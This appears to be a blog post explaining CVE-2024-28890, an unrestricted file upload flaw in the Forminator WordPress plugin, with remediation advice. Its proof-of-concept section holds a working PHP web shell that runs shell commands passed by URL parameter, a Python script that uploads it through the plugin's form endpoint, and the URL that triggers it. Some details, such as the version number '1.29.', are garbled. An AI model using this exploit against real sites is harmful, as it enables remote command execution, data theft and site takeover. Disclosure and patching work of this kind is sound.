---
Executive Summary
CVE-2024-28890 affects the popular WordPress plugin Forminator prior to version 1.29.. The core problem? Anyone could upload dangerous files—think PHP scripts, web shells, or other malicious executables—with zero real restriction. This leaves sites wide open for hackers to:
Crash the site, triggering Denial-of-Service (DoS)
In this post, you'll get a complete breakdown of why this flaw is so risky, how it works, and a simple exploit demonstration.
What is Forminator?
Forminator is a widely used WordPress plugin for making contact forms, quizzes, and polls—currently 300,000+ sites use it. File uploading is one of its most popular features: site visitors can attach documents, images, etc. to their form submissions.
The Vulnerability: Unrestricted File Upload
Vulnerability Class: Unrestricted Upload of File with Dangerous Type (OWASP A06:2021)
Impacted versions: All before 1.29.
Fixed in: 1.29.
__What’s happening?__
Forminator didn't properly check the type of files uploaded through its forms. There were no real restrictions: if a bad actor uploads a .php file with embedded code, WordPress stores it in a publicly accessible directory, where it could be executed by simply calling the URL in a browser.
Sensitive data theft: Attackers could read database config files, wp-config.php, etc.
- Site defacement or malware: Attackers could upload web shells or backdoors for persistent access.
Exploit Details: How an Attacker Breaks In
A hacker simply creates a form submission where the file field uploads a .php file. No special credentials required—just public access to the form. Once uploaded, the bad file sits in the site's upload directory, ready to be triggered.
Proof-of-Concept (PoC) Exploit
Below is a sample PHP web shell and a simple Python script to upload it.
Example: Simple PHP Shell (shell.php)
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
What does this do?
Any visitor going to the shell's URL and adding ?cmd=ls runs the command on your server!
Exploit Script (Python)
Replace values as needed for your site's form and file field names.
import requests
url = "https://target-site.com/wp-admin/admin-ajax.php";
form_id = "1" # Example, update for your site
# Update these for your form
files = {
"forminator_upload_field": ("shell.php", open("shell.php", "rb"), "application/x-php"),
}
data = {
"action": "forminator_submit_form_custom-forms",
"form_id": form_id,
}
r = requests.post(url, data=data, files=files)
print(r.text)
Now, find the file in /wp-content/uploads/forminator/ or the URL disclosed by the post, and access it:
https://target-site.com/wp-content/uploads/forminator/shell.php?cmd=whoami
Original References
- Sonar Security Advisory
- CVE-2024-28890 at NVD
- Forminator Plugin Changelog
How to Fix CVE-2024-28890
1. Update Immediately:
Upgrade to Forminator v1.29. or higher (download latest).
2. Audit Your Uploads:
Check /wp-content/uploads/forminator/ for unknown .php or .exe files and delete anything suspicious.
3. Harden WordPress:
deny from all
Consider a web application firewall (WAF)
4. Monitor for New Users, Suspicious Activity:
Hackers often add new admin users after exploiting such flaws.
Conclusion
This vulnerability shows why unrestricted file uploads are so dangerous and why even big plugins are not immune to classic bugs exploited for years. Anyone managing a WordPress site with Forminator must update now and do a quick security audit to look for traces of compromise.
If you liked this deep dive, consider subscribing for more real-world vulnerability breakdowns!
Timeline
Published on: 04/23/2024 05:15:49 UTC
Last modified on: 07/03/2024 01:51:54 UTC